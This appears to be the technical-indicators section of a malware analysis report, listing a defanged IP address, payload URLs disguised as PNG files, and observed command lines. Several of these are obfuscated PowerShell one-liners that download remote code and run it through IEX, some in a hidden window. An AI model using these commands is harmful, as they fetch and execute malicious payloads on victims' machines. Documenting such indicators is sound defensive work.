Technical Information
- '18#.#47.124.40':80
- http://18#.#47.124.40/x/8.png
- http://18#.#47.124.40/x/4.png
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://18#.#47.124.40/x/8.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://18#.#47.124.40/x/4.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
- '%WINDIR%\syswow64\ipconfig.exe' /flushdns
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://18#.#47.124.40/x/8.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://18#.#47.124.40/x/4.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X' (with hidden window)